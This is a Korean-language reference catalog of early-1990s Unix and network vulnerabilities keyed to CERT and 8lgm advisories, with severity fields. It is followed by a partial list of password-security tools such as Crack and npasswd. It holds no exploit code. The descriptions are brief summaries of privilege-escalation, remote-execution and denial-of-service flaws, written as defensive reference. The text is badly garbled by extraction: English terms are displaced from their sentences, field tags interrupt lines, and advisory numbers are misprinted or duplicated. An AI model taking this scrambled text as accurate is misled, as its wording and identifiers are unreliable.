OS CIS v8.2, CIS v8.3, v9.0, CIS v9.1
AP cisco
AD CA-92:20
SL 5
PL B
접근 목록의 취약점은 접근 목록에 의해 차단되어야 할 패킷을 통과시키DE Cisco
거나 반대로 통과시켜야 할 페킷을 차단는 오류를 발생시킬 수 있다DE , .
취약점VN ConvexOS/Secure passwd
PN cvspasswd
OS CVS v9.5, CVS v10.0
AP passwd
AD CA-92:21
SL 5
PL C
및 의 프로그램은 지역 사용자에 대해DE ConvexOS/Secure v9.5 v10.0 “passwd"
인가되지 않은 관리자 권한을 얻을 수 있도록 허용한다DE .
취약점VN ConvexOS CXbatch qmgr
PN cvxcxbqmgr
OS CVX v6.2 v10.2~
AP CXbatch v1.0 v2.1.3 qmgr~
AD CA-92:21
SL 4
PL C
상의 명령어는 취약점을 가지DE ConvexOS v6.2 v10.2 CXbatch v1.0 v2.1.3 qmgr~ ~
고 있으며 이 취약점을 이용해 지역 사용자들이 인가되지 않은 관리자권한을DE ,
을 획득할 수 있다DE .
취약점VN Convex CSM migmgr
PN cvxcsmmigmgr
OS CVX v10.1
AP CSM v1.0 mimgr
AD CA-92:21
SL 3
PL C
상의 의 명령어는 취약점을 가지고 있으며 이 취약점DE ConvexOS v10.1 CMS mimgr ,
을 이용해 지역 사용자들이 인가되지 않은 관리자권한을 획득할 수 있다DE .
취약점VN ConvexOS EMACS Editor
PN cvxemacs
OS CVX v9.0 v10.2~
AP emacs
AD CA-92:21
SL 4
PL C
의 에디터는 취약점을 가지고 있으며 이 취약점DE ConvexOS v9.0 v10.1 EMACS ,~
이용해 지역 사용자들이 인가되지 않은 관리자권한을 획득할 수 있다DE .
취약점VN HP/UX NIS ypbind
PN hpxypbind
OS HPX v8.0 v8.07~
AP ypbind
AD CA-93:01
SL 4
PL B
의 취약점은 자료에 대한 인가되지 않은 접근을 허용하며 이를 이DE HP NIS NIS ,
용하여 임의의 업체의 를 수행하는 원격호스트의 관리자가 의DE NIS HP NIS ypbind
를 수행시키고 있는 시스템의 관리자 권한을 얻을 수 있다DE .
취약점VN NeXT Netlnfo_writers
PN nex_writers
OS NEX v1.0 3.0~
AP_writers
AD CA-93:02a
SL 5
PL C
의 에 대한 기본 설정은 일반 사용자가 시스템 관리자의 도움DE Netlnfo _writers
없이 프린터나 팩스를 설치하고 이를 네트워크에 할 수 있게 한다 또한DE export .
일반 사용자가 시스템 관리자의 도움 없이 모니터 화면 등의 시스템 구성장치를DE
구성할 수 있게 한다 프린터나 팩스모뎀의 경우 인가되지 않은 관리자 권DE . ,
한을 허용할 수도 있으며 면의 겨우 다른 사용자들의 정상적인 로그인 접근을DE , ,
거부하게 만드는 문제점이 있다DE .
문제VN SunOS File/Directory Permissions
PN File/Directory Permissions
OS SUN
AP
AD CA-93;03
SL 5
PL A
파일 권한의 잘못 지정으로 지역 사용자가 권한을 가질 수 있다DE :root" .
취약점VN Commodore Amiga UNIX finger
PN ami_ fingerd
OS AMI 1.1, 2.x
AP fingerd
AD CA-93:04a
SL 5
PL A
명령의 보안문제로 인하여 일반사용자가 파일에 불법적으로 접근할 수DE finger
있다DE .
취약점VN wuarchive ftpd
PN wu-ftpd
OS *
AP ftpd
AD CA-93:06
SL 5
PL A
침입자는 가 수행중인 호스트에서 관리자를 포함 모든 계정에 접근할DE WU-ftpd ,
수 있다DE .
취약점VN Cisco Router Packet
와PN Cisco_H
OS Cisco 8.2, 8.3, 9.0, 9.1, 9.17
AP
AD CA-93:07
SL 5
PL B
라우터에서 를 사용할 때 인가되지 않은 트래픽도DE Cisco ‘no ip source-route' ,
통과시킨다DE .
취약점VN SCO/bin/passwd
PN sco_passwd
OS SCO 3.2 V2.0, 4.0, 4.1 SCO open Desktop R 1.1.×,2.0&
AP /bin/passwd
AD CA-93:08
SL 5
PL A
비인가된 사용자의 로그인은 막지만 의 문제로 인하여 인가된 사용DE /bin/passwd
자의 로그인도 허용안 할 수도 있다DE .
VN SunOS/Solaris/usr/lib/expreserve Vulnerabiliry
PN sun_expreserve
OS SUN 4.1.×, Sol 2.×
AP /usr/lib/expreserve
AD CA-93:09
SL 5
PL A
이 버그는 시스템이 되거나 편집상태가 확실히 종료되지 않을 경우 사용자DE crash
가 소유의 파일을 할 수 있다DE root overwrite .
구성VN Anonymous FTP
PN conf_ftp
OS *
AP ftpd
AD CA-93:10
SL 5
PL B
서비스를 제공할 때 권한을 주는 디렉토리 생성시 이DE Anonymous FTP worldwiwrite
를 악용하여 외부 사용자가 시스템의 중요한 파이를 가져갈 수 있다DE .
와 취약점VN UMN UNIX gopher gopher+
PN umn_gopher
OS *
AP gopher
AD CA_93:11
SL 5
PL B
서버나 수행시 내 외부 사용자는 든 일반 사DE gopher public access client , root
용자든 제한없는 접근이 가능하며 화일같은 중요정보도 읽을 수 있다DE passwd .
취약점VN Novell LOGIN, EXE
PN novell_login
OS Netware 2.×, 3.× Netware for UNIX&
AP login. exe
AD CA-0.3:12
SL 5
PL A
디스크에 사용자의 계정과 패스워드를 잠시 저장하기 때문에 이를 다른 사용자DE
가 읽을 수 있다DE .
취약점VN SCO Home Directory
PN
OS SCO
AP
AD CA-93:13
SL 5
PL A
유닉스에서 계정의 경우 홈 디렉토리가 또는DE SCO “dos", 'asg" /tmp /usr/tmp
이다 그러나 이 디렉토리는 누구나 사용할 수 있어 누구나 계정을 얻을 수DE . ,
있다DE .
와 취약점VN usr/lib/sendmail, /bin/tar, /dev/audio
PN sun_sendmail, sun_tar, sun_audio
OS SUN 4.1.×, SOL 2.×
AP /usr/lib/sendmail, /bin/tar,/ dev/audio
AD CA-93:15
SL 5
PL B
버그로 인하여 원격지 사용자가 시스템으로 접근할 수DE 1./usr/lib/sendmail
있다DE .
의 문제로 인하여 파일을 생성 시 의 일부를 합DE 2. /bin/tar tar /etc/passwd
할수 있다DE .
시스템에 접근한 사용자는 근접한 곳에서 마이크로 통화하고 있DE 3. /dev/audio
는 내용을 도청할 수 있다DE .
취약점VN Sendmail
PN all_sendmail
OS *
AP sendmail
AD CA-93:16
SL 5
PL B
원격 사용자든 지역 사용자든 의 버그를 이용하여 관리자가 아닌 다른DE senmail
어떤 계정으로도 프로그램을 실행 시킬수 있다DE .
취약점VN xterm logging
PN xterm_bug
OS *
AP xterm
AD CA-93:17
SL 5
PL A
로 동작하는 은 함수에 문제점을 가지고 있으며 이DE setid, setgid xterm logging
는 지역사용자가 관리자권한으로 임의의 파일을 만들거나 수정할 수 있게 한DE ,
다DE .
와 취약점VN SunOS/Solbourne loadmodule modload
PN loadmodule_bug, modload_bug
OS SUN 4.1.×, SOL 2.×, SOS
AP /usr/etc/loadmodule, /usr/etc/modload
AD CA-93:18
SL 5
PL A
모두 관리자의 유효 설정이 되어 있어 침입자는DE loadmodule, modload UID(EUID)
이를 이용하여 지역사용자가 관리자의 권한을 가질 수 있다DE .
취약점VN Solar is System Startup
PN startup_bug
OS SOL 2.×
AP fsck
AD CA-93:19
SL 5
PL A
부팅시 가 실패하면 시스템 콘솔에 관리자 셀이 뜨기 때문에 누구나 관리DE fsck ,
자의 권한을 가진다 단 물리적으로 시스템에 접근해 있어야 함DE .( , .)
VN Ongoing NetworkMonitoring Attacks
PN sniffer
OS *
AP
AD CA-94:01
SL 5
PL B
네트워크 모니터링을 통하여 등의 세션 경우 처음 바DE FTP, TELNET, RLOGIN 128K
이트를 모니터링 하여 사용자 계정과 패스워드를 알아낼 수 있다DE .
취약점VN SunOS/usr/etc/rpc.mountd
PN sun_rpcmount_bug
OS SUN 4.1.×SOL 2.×, Solbouen 4.1×
AP /usr/etc/rpc.mountd
AD CA-95:05
SL 5
PL A
의 한 레코드가 문자 이상이거나 의 캐쉬가 용량을DE /etc/exports 256 , netgroups
초과 할 경우 모든 사용자에게 마운트된다 이로 인하여 비인가자가 파일시스DE .
템을 마운트하여 그 파일시스템의 파일들에 대해 읽기 쓰기를 할 수 있다DE , .
VN MD5 Checksums
PN check_sum
OS *
AP md5
AD CA-94:05
SL 5
PL B
침입자는 재차 시스템에 접근하기 위하여 시스템 파일을 수정하기도 한다 이DE .
를 방지하기 위하여 기존의 시스템 파일들을 알고리즘을 이용하여 체크썸DE MD5
값을 만들어 놓고 수시로 비교하여 수정된 시스템 파일이 있는지를DE (checksum)
점검할 수 있다DE .
취약점VN Writable/etc/utmp
PN utmp_bug
OS SUN 4.1.×, SOL1.×
AP /etc/utmp
AD CA-94:06
SL 5
PL A
파일이 관리자가 아닌 사용자에 의해 쓰기가 가능하면 이 파일에 새DE /etc/utmp
로운 정보를 입력하여 관리자권한을 획득 할 수 있다DE .
VN wuarchive ftpd Trojan Horse
PN trojan_ftpd
OS *
AP ftpd
AD CA-94:07
SL 5
PL A
의 소스코드를 수정하여 를 제외한 사용자의 계DE wuftpd 2.2 2.1f ‘Anonymous'&
정과 패스워드를 얻어낼수 있는 프로그램으로 수정한 트로이 목마 프로그램이DE
있다DE .
취약점VN ftpd
PN ftpd_site
OS *
AP ftpb
AD CA-94:08
SL 5
PL A
서버의 설치시 문제로 인해 에서 명령어를 제공할 경우 일DE FTP ftpd SITX EXEC
반 사용자가 관리자로 접근할 수 있다 이와 같은 보안의 허점이 있는 것은DE .
이전 그리고 야 이전DE wu-ftpd 2.0-2.30DECWRL ftpd ver 5.93 BS ftpd ver 1.1
의 것이다DE .
VN /bin/login Valnerability
PN aix_login
OS IBM AIX 3, LIN
AP /bin/login
AD CA-94-09
SL 5
PL A
의 파싱 버그로 인가되지 않은 사용자가 관리자로 로그인DE AIX login (parsing) ,
가능하다DE .
취약성VN IBM AIX bsh
PN aix_bsh_bug
OS IBM
AP bsh
AD CA-94:10
SL 5
PL B
의 큐잉 시스템은 배치큐인 를 가지는데 네트워크 프린트가 사DE IBM AIX bsh
용중이면 지역이나 외부사용자는 관리자의 권한을 얻을 수 있다DE .
취약점VN sendmail
PN sendmail_d, sendmail_oE
OS *
AP sendmail
AD CA-94;12
SL 7
PL C
옵션은 로칼 사용자가 관리자권한을 얻을 수 있게한다DE 1. sendmail_d .
옵션은 로칼 사용자가 시스템의 임의의 파일을 읽게한다DE 2. sendmail_oE .
취약점VN SGI IRIX Help
PN sgi_help_bug
OS IRI5.1, 5.2
AP SGI help system, printer manager
AD CA-94:13
SL 5
PL B
와 관리자의 버그는 비인가된 사용자가 시스템에 로그인을 할수DE SGI help print
있거나 물리적으로 시스템 콘솔에 접근할 수 있으면 관리자의 권한을 얻을 수DE
있다DE .
문제VN IRC Trojan Horse
PN irc_troijan
OS *
AP ircll v.2.2.9
AD CA-94:14
SL 5
PL B
이 트로이목마 는 사용자의 계정에 대하여 비인가 접근을 할 수 있고DE IRC IRC
관리자권한으로 가 수행중이면 이 는 관리자계정으로 불DE IRC client trojan IRC
법접근을 가능케 해준다DE .
취약성VN NFS
PN nfs_1
OS *
AP nfs
AD CA-94:15
SL 7
PL C
를 통한 많은 취약성이 있는데 최악의 경우 관리자의 권한을 얻을 수 있DE NFS ,
다DE .
VN IP spoofing Attack
PN ip_spoof
OS *
AP
AD CA-95:01
SL 2
PL C
의 약점을 이용하여 주소를 속임으로 불법적 접속을 맺는다DE tcp/ip protocol IP .
VN Hijacked Terminal Connections
PN hijacked_term
OS SUN 4.1.×
AP
AD CA-95:01
SL 4
PL C
침입자가 을 동적으로 수정할 수 있는 을 이용하여 다른 사용DE UNIX kernel tool
자의 네트워크 접속을 훔친다DE .
의 취약점VN /bin/mail
PN binmail_bug
OS DEC, SUN 4.×
AP /bin/mail
AD CA-95:02
SL 5
PL B
의 취약점을 이용하여 지역사용자가 시스템 관리자소유의 파일을 만DE bin/mail
들거나 수정하여 불법적인 관리자 접근을 할 수 있다DE .
암호화 취약점VN telnet
PN telnet_enc
OS *
AP Berkeley Telnet
AD CA-95:03
SL 5
PL A
암호화 된 세션 패킷을 등의 방법으로 접근 가능하다면 이 세DE telnet sniffering
션은 쉽게 복호화 될 수 있다DE .
취약점VN NCSA HTTP Daemon
PN ncsa_http
OS *
AP NCSA HTTP V.1.3
AD CA-95:04
SL 3
PL A
외부의 사용자가 가 동작중인 프로그램에 임의의 쉘명령을 수행시켜 사용DE httpd
자계정에 대한 불법적 접근이 가능해진다DE .
취약점VN Sendmail IDENT
PN sendmail_indent
OS *
이하AP Sendmail 8.6.9
AD CA-95:05
SL 2
PL A
를 지원하는 의 문제로 외부의 침입자가 불법DE IDENT(RFC 1413) sendmail version
적 접근을 하게되고 불법적 특권을 가지게 된다DE .
의 버그VN satan
PN satan1.0
OS *
AP SATAN V.1.0
AD CA-95:07a
SL 5
PL B
프로세스에 접근을 보호하는 세션키 가 노출될 경우 다른DE SATAN (session key)
사용자가 을 실행시키는 시스템에 임의의 스크립트를 실행시킬 수DE SATAN perl
있다DE .
취약성VN Sendmail v.5
PN sendmail5
OS *
AP sendmail v.5
AD CA-95:08
SL 7
PL C
의 문제로 인하여 침입자가 파일을 만들거나 수정하고 프로그램을DE senamial v 5
실행시킬 수 있다DE .
취약점VN Solaris ps
PN sol_ps
OS SOL2.×, SUN5.×
AP ps
AD CA-95:09
SL 3
PL B
명령이 수행중 디렉토리에 임시파일을 보관하는데 디렉토리가DE ps /tmp /tmp tm
기권한이 개방되면 침입자는 을 이용하여 관리자 권한을 얻을DE race condition
수 있다DE .
취약성VN ghostscrips
PN ghostscrips2.6
OS *
AP ghostscrips 2.6 - 3.22beta
AD CA-95:10
SL 5
PL B
인 의 옵션이 불완전하게 구현되어DE postscrips viewer ghostscripts -dSAFER
에 포함된 불법 코드를 실행시킬 수 있다DE PostScripts .
취약성VN Sun Sendmail - oR
PN sun_sendmail-or
OS SUN4.1.×
AP sendanil(100377-19 for sun4.1.3, 101665-04 for 4.1.3_U1, 102423-01 for sun4.1.4)
AD CA-95:11
SL 3
PL B
의 옵션은 지역 사용자가 관리자권한을 얻을 수 있게 한다DE sendmail -oR .
취약점VN Sun4.1.×Loadmodule
PN sun_loadmodule1
OS SUN4.1.×
AP loadmodule
AD CA-95:12
SL 5
PL A
관리자 를 이용하여 비인가자가 관리자 권한을 얻을 수 있DE setuid loadmodule
다DE .
취약성VN syslog
PN syslog1
OS * except NEWS-OS6.x, SUN5.5(Solaris2.5), Linux4.7.2
AP syslog syslogd
AD CA-95:13
SL 3
PL A
서부루틴이 내부버퍼에 메시지를 만들 때 범위를 체크하지 않기 때문에 내부버퍼DE syslog
를 오버플로우시키고 서브루틴 콜스택을 다시 쓸 수 있는 문제점으로 말미암아 임의의DE
프로그램 실행으로 지역 원격사용자가 관리자의 권한을 가질 수 있다DE , .
환경의 취약성VN Telnetd
PN telnetenv
OS *
AP RFC1408/1572 compiliant telnetd
AD CA-95:14
SL 5
PL A
는 환경변수를 다른 시스템으로 전달할 수DE RFC1408/RFC1572 compiliant telnetd
있어 지역 및 원격 사용자가 과 을 우회하여 관리자가 될 수 있다DE login authentication .
취약점VN SGI lp
PN iri_lp
OS IRI
AP lp
AD CA-95:15
SL 3
PL C
설치시 몇몇 계정은 패스워드 없이 설치되는데 그중 계정도 패스워드없이DE SGI IRIX lp
설치된다 따라서 외부사용자가 인증 없이 계정으로 시스템에 접근할 수 있다DE . lp .
취약성VN wu-ftpd Misconfiguration
PN wuftpd
OS LIN
AP wu-ftpd v.2.4 below
AD CA-95:16
SL 3
PL B
에서 잘못된 변수 설정으로 지역계정을 가진 사용DE wu-ftpd v2.4 (_PATH_EXECPATH)
자가 권한을 가질 수 있다DE .
취약성VN rpc. ypupdated
PN ypupdate
OS *
AP rpc. ypupdated
AD CA-95:17
SL 3
PL B
의 문제로 인하여 원격 사용자가 서비스를 제공하는 시스템에서 임DE rpc. ypupdated NIS
의의 프로그램을 실행할 수 있다DE .
에 공격 가능성이 있음VN U port Denial-of Service Attack(IP spoofing )
PN
OS *
AP
AD CA-96:01
SL 5
PL B
불필요한 서비스를 제공하면 침입자가 네트워크나 시스템에 공DE UDP Denail-of-Service
격을 시도할 수 있다DE .
취약성VN BIND
PN bind_1
OS *
AP BIND
AD CA-96:02
SL 2
PL C
침입자가 에게 거짓의 정보를 주어 인가된 이름으로 가장 불법 접근을 할 수DE DNS ,
있다DE .
의 취약성VN Kerberos 4 key Server
PN kerberos_bug
OS * except SCO
AP kerberos4
AD CA-96:03
SL 2
PL A
침입자가 인가된 사용자로 가장하여 서비스를 제공받을 수 있다DE kerberos .
네트워크 서버로 부터의 변조된 정보VN
PN info_chk
OS *
로부터 정보를 제공받는 모든 프로그램AP Information server
AD CA-96:04
SL 4
PL B
로부터 제공되는 정보를 확인하지 않는 프로그램은DE information server(DNS, YP, NIS)
예상치 않은 동작을 하여 기대치 않았던 결과를 낳을 수 있다 특히 비인가된 지역DE . ,
외부 사용자에게 관리자접근을 허용할 수 있다DE .
취약성VN Java
PN java_chk
OS *
AP Netscape Navigator 2.0 java implementation, Java developer's Kit 1.0
AD CA-96:05
SL 5
PL B
이 로드된 호스트로만 접속이 이루어져야 한다는 제약을 어기고 프로그래밍할DE applet
경우 그 은 임의의 호스트와도 연결될 수 있다DE applet .
예제 코드의 취약성VN NCSA/Apache CGI
PN cgi_escape_shell_cmd
OS *
AP escape_shell_cmd
AD CA-96:06
SL 4
PL A
를 쓰는 는 원격지 사용자가 쓰기개방된 모든 파일을 읽거나DE escape_shell_cmd httpd
파일을 쓸 수 있다DE .
의 취약성VN Java Bytecoverifier
PN java_byte
OS *
AP Java Development Kit 1.0.1
AD CA-96:07
SL 2
PL A
가 유해한 자바 을 가지고 있으면 그 은 어떠한 오퍼레이션도DE Web page applet applet
DE 실행할 수 있고 부비트랩을 만들 수도 있다.
의 취약성VN PCNFSD
PN lp_pcnfsd
OS *
AP pcnfsd
AD CA-96:08
SL 5
PL B
프로그램은 허가 모드를 바꾸게 하거나 원격지 사용자가 임의의 명령을 관리자DE pcnfsd
권한으로 실행하도록 할 수 있다DE .
의 취약성VN rpc.statd
PN rpc_statd
OS *
AP rpc.statd
AD CA-96:09
SL 3
PL B
이 창 프로그램으로부터의 정보를 확인하지않기 때문에 관리자가DE rpc.statd rpc.lo NFS
상에서 파일을 지우거나 생성할 수 있는 것처럼 도 파일을 지우거나DE Server rpc.statd
생성할 수 있다DE .
취약성VN NIS+ Configuration
PN nis_conf
OS SOL2.5
AP mAP
AD CA-96:10
SL 1
PL A
몇몇의 의 설치에서 테이블의 권한이 안전하지 않게 되어 불법 침입DE NIS+ NIS+ passwd
DE 이 가능하게 된다.
디렉토리에 있는 인터프리터의 문제점VN CGI bin
PN cgi_bin
OS *
AP
AD CA-96:11
SL 6
PL C
만약 를 실행하기위한 일반목적의 인터프리터가 서버의 디렉DE cgi scripts Web CGI bin
토리에 있으면 인터프리터가 실행할 수 있는 명령을 원격지사용자가 실행할 수 있다DE .
의 취약성VN suidperl
PN suidperl
OS *
AP suidperl, sperl
AD CA-96:12
SL 3
PL A
와 를 지원하는 시스템에서 또는 프로DE saved set-user-ID set-group-ID suid perl sperl
그램을 돌리면 을 일으켜 지역사용자가 관리자 권한을 얻을 수 있다DE race condition .
프로그램의 취약성VN dip
PN dip_1
OS LIN
AP dip
AD CA-96:13
SL 4
PL B
프로그램은 와 같은 다이얼업 접속을 다루는데 로 실행되어DE dip SLIP, PPP setuid ,
가 되면 셸과 같은 프로그램이 관리자권한으로 실행되어 관리자DE internal butter overflow
권한도 얻을 수 있다DE .
의 취약성VN rdist
PN rdist_2
OS *
AP rdist(lookup)
AD CA-96:14
SL 1
PL A
프로그램 중 콜에서 어떤 코드가 인수로 주어져 서브루틴 이 오DE rdist lookup call stack
버플로우되면 서브루틴이 그 코드를 반환하게 되고 가 로 실행되기 때문에DE rdist setuid
관리자 권한으로 실행되게 된다 따라서 일반 계정을 가진 사용자가 관리자가 될 수DE .
있다DE .
프로그램의 취약성VN Solaris 2.5 KCMS
PN sol_kcms
OS SOL2.5
AP kcms_calibrate, kcms_configure
AD CA-96:15
SL 1
PL A
두 프로그램은 설정이 되어 있어 지역 사용자가DE kcms_calibrate, kcms_configure setuid
임의의 파일을 생성하거나 쓸 수 있다 따라서 관리자권한도 얻을 수 있다DE . .
의 취약성VN Solaris admintool
PN sol_adm
OS SOL2.x
AP admintool
AD CA-96:16
SL 1
PL A
의 은 메커니즘으로 임시파일을 만드는데 설정으로 인하DE solaris admintool locking setuid
여 임의의 파일을 생성하거나 쓸 수 있다 는 관리자로 되어 있어 바로DE . solaris2.5 setuid
관리자의 권한으로 파일을 조작할 수 있다DE .
의 취약성VN Solaris vold
PN sol_vold
OS SOL2.5
AP vold
AD CA-96:17
SL 1
PL A
과 를 관리하는 데몬은 임시 파일을 관리자 권한으로 만드는데 이때DE cdrom floppy vold
관리자의 권한으로 새로운 파일을 생성하거나 쓸 수 있다DE .
의 취약성VN fm_fls
PN fm
OS *
AP FrameMaker v.4.x, 5.x
AD CA-96:18
SL 1
PL A
가 잘못된 인수를 받으면 로그 파일에 그 내용을 쓰게 되는데 그때 로그 파일은DE fm_fls
권한이 바뀌어 읽기 쓰기가 개방된다DE , .
의 취약성VN expreserve
PN expreserve_1
OS *
AP expreserve
AD CA-96:19
SL 3
PL B
세션이 정상적으로 종료하지 않을 때 그 상태를 유지하는 유틸리티는DE edit expreserve
계정을 가진 사용자가 관리자의 권한을 갖을 수 있게 한다DE .
취약점VN rdist
PN rdist_vul
OS SUN 4.1.2, SCO 3.2v4.2, BSD NET/2
AP /usr/bin/rdist
AD 8lgm-adv-1
SL 3
PL A
관리자로서 을 수행하기 위하여 을 사용하는데 이를 이용하여 관리자로DE sendamil popen
서 임의의 프로그램을 수행시킬 수 있다DE .
취약점VN autoreply
PN autoreply_vul
OS *
AP /usr/local/bin/autoreply
AD 8lgm-adv-2
SL 4
PL A
를 접근할 수 있는 사용자는 버그를 이용 시스템 파일을 바꿔서 관DE autoreply autoreply ,
리자가 될 수 있다DE .
취약점VN lpr
PN lpr_vul
OS SUN 4.1.1, BSD 4.3, BSD NET/2
AP /usr/ucb/lpr, /usr/bin/lpr
AD 8lpm-adv-3
SL 4
PL A
는 의 디렉토리에 심볼릭 링크를 만들게 하는데 의 번 호출 후DE lpr -s lpd spool , lpr 1000
디렉토리는 의 이름을 재사용한다 이를 이용하여 시스템 파일을 수정한 수DE spool spool .
관리자가 될 수 있다DE .
취약점VN gopher
PN gopher_vul
OS *
AP /usr/local/bin/gopher
AD 8lpm-adv-4
SL 4
PL A
의 계정이 안전하지 못하여 로부터 쉘 접근이 가능하다DE gopher guest gopher .
취약점VN mail
PN binmail_vul
OS 4.1.x
AP /usr/bin/mail
AD 8lgm-adv-5
SL 3
PL A
에 존재하는 을 이용하여 임의의 사용자 권한의 파일을 생성하여DE binmail race condition
관리자의 권한을 획득할 수 있다DE .
취약점VN mail (2)
PN binmail1_vul
OS 4.1.x
AP /usr/bin/mail
AD 8lgm-adv-6
SL 3
PL A
파일시스템 어디에나 길이가 인 파일을 생성할 수 있는 문제를 이용하여 파일DE 0 .rhosts
을 만든 수 관리자가 될 수 있다DE .
취약점VN passwd
PN passwd_vul
OS SUN 4.1.x
AP /usr/bin/passwd
AD 8lgm-adv-7
SL 4
PL A
는 관리자의 권한으로 파일을 바꾸는데 이 수행동안 를 수DE passwd passwd passwd path
정함으로서 화일을 변환시킨 후 관리자로 접근하게 된다DE .rhosts .
취약점VN kernel
PN kernel_vul
OS SUN 4.1.x
의AP SUN 4.1.x kernel
AD 8lgm-adv-8
SL 4
PL C
파일시스템이 사용중이라면 임의의 사용자가 을 망가뜨릴 수 있다 즉DE TMPFS kernel .
시스템 고장을 일으킬 수 있다DE .
취약점VN urestore
PN urestore_vul
OS Sv4/i386 4.0.3, Sv4
AP urestore
AD 8lgm-adv-9
SL 4
PL A
파일시스템 어디에나 파일을 생성 또는 수정할 수 있는 문제점을 이용하여 관리자권한DE
을 가지게 된다DE .
취약점VN at
PN at_vul
OS SCO 3.2v4.2
AP at
AD 8lgm-adv-10
SL 5
PL A
으로 임의의 명령을 수행하는데 를 사용하여 관리자가 될 수 있다DE group cron at .
취약점VN sadc
PN sadc_vul
OS SCO 3.2v4.2, Sv4/i386 4.0.3,
AP /usr/lib/sa/sadc
AD 8lgm-adv-11
SL 3
PL A
는 쓰기권한이 없는 디렉토리에 파일을 만드는데 사용되는 것으로 에서는 유DE sadc SCO
효 관리자로 동작한다 따라서 이를 이용하는 관리자소유의 파일을 만들 수 있다DE EID . .
취약점VN suid_exec
PN suid_exec_vul
OS *
AP /usr/bin/ksh
AD 8lgm-adv-12
SL 3
PL A
는 관리자로서 임의의 프로그램을 수행하는데 사용되는데 이를 악용하여 일반DE suid_exec
사용자가 관리자가 될 수 있다DE .
취약점VN login
PN login_vul
OS SCO 3.2v4.2
AP /bin/login
AD 8lgm-adv-13
SL 3
PL A
일반 사용자가 관리자가 될 수 있다DE .
취약점VN prwarn
PN prwarn_vul
OS SCO 3.2v4.2
AP prwarn
AD 8lgm-adv-14
SL 4
PL A
일반 사용자가 이 파일시스템에 파일을 생성할 수 있는 점을 악용하여 관리자가DE prwarn
될 수 있다DE .
취약점VN mail (3)
PN mail2_vul
OS SUN 4.1.x
AP /usr/bin/mail
AD 8lgm-adv-15
SL 5
PL A
의 취약점은 파일이 관리자 소유로 만들어지게 할 수 있다DE binmail .
의 취약점VN sendmail (2)
PN sendmail2_vul
OS SUN
AP SUN 4.x sendmail
AD 8lgm-adv-16
SL 3
PL B
대의 문제로 인하여 내부의 어느 사용자든지 관리자가 될 수 있다DE SunOS 4.x .
의 취약점VN sendmail (3)
PN sendmail3_vul
OS SUN 4.1.x
AP Sendmail V5.x, IDA Sendmail V5.x
AD 8lgm-adv-17
SL 3
PL B
의 문제로 인하여 사용자가 원격에서 명령을 수행하거나 파일을 추가할 수DE Sendmail V5
있다DE .
의 취약점VN kernel (2)
PN kernel2_vul
OS SUN 4.1.x
의AP SUN 4.1.x kernel
AD 8lgm-adv-18
SL 3
PL C
이 되어있을 때 임의의 사용자가 패닉 오류를 발생시켜 시스DE HSFS cdrom mount kernel
템 고장을 일으킬 수 있다DE .
의 취약점VN link
PN link_vul
OS SUN 4.1.x
AP link system call
AD 8lgm-adv-19
SL 3
PL C
해주는 디렉토리가 공개적으로 쓰기권한이 있을 경우 을 사용하는DE link link system call
프로그램은 잠재적으로 관리자권한을 갖는데 사용될 수 있다DE .
취약점VN sendmail(4)
PN sendmail3_vul
OS SUN 4.1.x
AP Sendmail V5
AD 8lgm-adv-20
SL 3
PL B
가 제어파일을 쓰기 모드로 하는데 다른 프로세스가 이 제어파일DE sendmail V5 open
를 가로챌 수 있는 이 존재한다 이로서 임의의 일반사용자가DE descripter race condition .
그들 자신의 제어파일을 쓸 수 있고 관리자로서 프로그램들을 수행시킬 수 있다DE .
취약점VN sendmail(5)
PN sendmail4_vul
OS SUN 4.1.x
AP Sendmail
AD 8lgm-adv-21
SL 2
PL A
으로 사용자가 쉽게 관리자가 될 수 있다DE -oR option local .
취약점VN syslog
PN syslog_vul
OS SUN 4.1.x
AP syslog
AD 8lgm-adv-22
SL 1
PL A
메시지들을 만들기 위하여 내부 버퍼를 사용하는데 을 하지않는 단점을DE bound checking
이용하여 내부 외부의 사용자들이 관리자의 권한을 얻을 수 있다DE , .
취약점VN loadmodule
PN loadmodule_vul
OS SUN 4.1.x
AP Openwindow 3
AD 8lgm-adv-23
SL 3
PL A
은 기계의 아키텍쳐를 찾기 위해서 명령을 사용하는데 이를 악용하DE loadmodule system
여 지역사용자가 관리자가 될 수 있다DE .
취약점VN sendmail_wrapper
PN sendmail_wrapper
OS SUN 4.1.x
AP sendmail_wrapper.c
AD 8lgm-adm-24
SL 3
PL B
의 버그를 해결키위해 배포한 의 는 잠재적 공격DE sendmail V5 CERT sendmail_wrapper
을 찾기위해 를 사용하는데 불완전하게 수행되어 오히려 지역 사용자가 관리DE hole syslog
자 권한을 가지게 할 수 있다DE .
취약점VN locore
PN locore_vul
OS SUN 4.1.x/sun4c
AP locore.o
AD 8lgm-adm-25
SL 4
PL C
국지의 일반사용자가 이나 잘못된 연산으로 커널 패닉을 일으킬 수 있DE watchdog reset
다DE .
취약점VN rdist(2)
PN rdist_vul
OS SOL 2.x, SUN 4.1.x
AP rdist
AD rdist 8lgm-adm-26
SL 3
PL A
는 사용자가 제공하는 에 의존하여 에러메세지를 만드는데 버퍼의 한계를 검DE rdist string
사하지 않는다 이 버퍼는 스택에 있으며 따라서 임의의 명령이 수행 가능하다 이를 이DE . .
용하여 일반 사용자가 관리자 권한을 얻는다DE .
공개 전산망 보안 도구 현황
패스워드 및 인증 도구1.
보안 도구명 Crack
지원 시스템
주요 기능 시스템의 패스워드 파일을 사전에 등록된 단어들과 규칙들을 이용하여 해독-
구성 언어를 이용하여 사용자가 추정 형태를 프로그램 가능-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/crack
보안 도구명 Shadow
지원 시스템
주요 기능 패스워드 파일을 암호화하여 일반 사용자로부터 숨김-
쉐도우 패스워드 쉐도우 그룹 패스워드 파일을 지원- , , DBM
패스워드의 길이를 두배 확장-
패스워드 기능- Aging
입 수 처 ftp://ftp.std.com/src/freeunix/shadow.tar.Z
보안 도구명 cracklib
지원 시스템
주요 기능 등으로 패스워드 해독에 사용되는 함수들의 라이브러리- Crack
류의 프로그램에서 사용가능- passwd
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/cracklib/
보안 도구명 npasswd
지원 시스템
주요 기능 적절하지 않은 패스워드 사용을 방지-
의 패스워드 및 의 를 지원함- System 3 Aging SUN NIS
입 수 처 ftp://ftp.cc.utexas.edu/pub/npasswd/
보안 도구명 passwd+
지원 시스템
주요 기능 적절하지 않은 패스워드 사용을 방지-
구성 파일을 사용하여 패스워드 검사를 위해 사전 등의 파일의 내용을 참조하거나 외부- ,
프로그램을 호출하는 것이 가능
